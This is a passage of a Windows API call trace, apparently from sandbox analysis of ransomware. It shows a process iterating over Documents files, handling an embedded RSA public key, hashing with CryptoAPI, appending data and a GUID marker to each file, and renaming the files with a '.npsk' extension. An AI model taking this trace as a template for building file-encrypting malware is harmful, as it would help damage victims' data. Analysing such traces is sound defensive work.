KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.274] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.274] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.274] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.276] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.276] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.276] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.276] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.276] GetLastError () returned 0x0 [0215.276] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.276] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.276] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.276] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.276] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.276] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.276] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.276] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.277] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x4ec1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.277] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.277] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.277] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.277] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.277] CloseHandle (hObject=0x61c) returned 1 [0215.282] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4dOc.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4doc.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4dOc.docx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4doc.docx.npsk")) returned 1 [0215.283] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.283] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.283] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.284] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x77e7d8 | out: hHeap=0x750000) returned 1 [0215.285] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2305e0, ftCreationTime.dwHighDateTime=0x1d5e265, ftLastAccessTime.dwLowDateTime=0xe9a44d40, ftLastAccessTime.dwHighDateTime=0x1d5dc49, ftLastWriteTime.dwLowDateTime=0xe9a44d40, ftLastWriteTime.dwHighDateTime=0x1d5dc49, nFileSizeHigh=0x0, nFileSizeLow=0x70e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4l-Mi22fVj9HTyGXTBe.rtf", cAlternateFileName="4L-MI2~1.RTF")) returned 1 [0215.285] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4l-Mi22fVj9HTyGXTBe.rtf") returned=".rtf" [0215.285] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4l-Mi22fVj9HTyGXTBe.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4l-mi22fvj9htygxtbe.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.285] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=28900) returned 1 [0215.285] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.287] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x70be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.287] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.298] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x70e4, lpOverlapped=0x0) returned 1 [0215.299] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.300] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.304] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.304] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.305] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.305] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.305] GetLastError () returned 0x0 [0215.305] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.305] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.305] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.305] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.305] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.305] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.305] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.306] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.308] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x70e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.308] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.309] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.309] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.309] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.309] CloseHandle (hObject=0x61c) returned 1 [0215.320] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4l-Mi22fVj9HTyGXTBe.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4l-mi22fvj9htygxtbe.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4l-Mi22fVj9HTyGXTBe.rtf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4l-mi22fvj9htygxtbe.rtf.npsk")) returned 1 [0215.320] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.320] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.321] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.322] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x77e7d8 | out: hHeap=0x750000) returned 1 [0215.322] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cef3c0, ftCreationTime.dwHighDateTime=0x1d59276, ftLastAccessTime.dwLowDateTime=0x98b13c60, ftLastAccessTime.dwHighDateTime=0x1d5d7f1, ftLastWriteTime.dwLowDateTime=0x98b13c60, ftLastWriteTime.dwHighDateTime=0x1d5d7f1, nFileSizeHigh=0x0, nFileSizeLow=0x14b7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5QehJ-chz.xlsx", cAlternateFileName="5QEHJ-~1.XLS")) returned 1 [0215.322] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5QehJ-chz.xlsx") returned=".xlsx" [0215.322] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5QehJ-chz.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5qehj-chz.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.324] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=84861) returned 1 [0215.324] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.326] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x14b57, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.326] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.327] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x14b7d, lpOverlapped=0x0) returned 1 [0215.329] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.329] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.329] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.329] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.330] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.330] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.330] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.331] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.331] GetLastError () returned 0x0 [0215.331] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.331] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.331] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.331] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.331] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.331] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.331] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.332] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.333] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x14b7d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.333] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.333] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.333] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.333] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.333] CloseHandle (hObject=0x61c) returned 1 [0215.335] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5QehJ-chz.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5qehj-chz.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5QehJ-chz.xlsx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5qehj-chz.xlsx.npsk")) returned 1 [0215.336] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.336] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.336] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.338] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x77e7d8 | out: hHeap=0x750000) returned 1 [0215.338] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7b3360, ftCreationTime.dwHighDateTime=0x1d593ad, ftLastAccessTime.dwLowDateTime=0xb8afc2f0, ftLastAccessTime.dwHighDateTime=0x1d59379, ftLastWriteTime.dwLowDateTime=0xb8afc2f0, ftLastWriteTime.dwHighDateTime=0x1d59379, nFileSizeHigh=0x0, nFileSizeLow=0x1f44, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6leiTZ.docx", cAlternateFileName="6LEITZ~1.DOC")) returned 1 [0215.338] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6leiTZ.docx") returned=".docx" [0215.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6leiTZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6leitz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.338] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=8004) returned 1 [0215.338] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.340] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1f1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.340] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.342] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x1f44, lpOverlapped=0x0) returned 1 [0215.343] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.343] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.343] lstrlenA (lpString="-----BEGIN PUBLIC 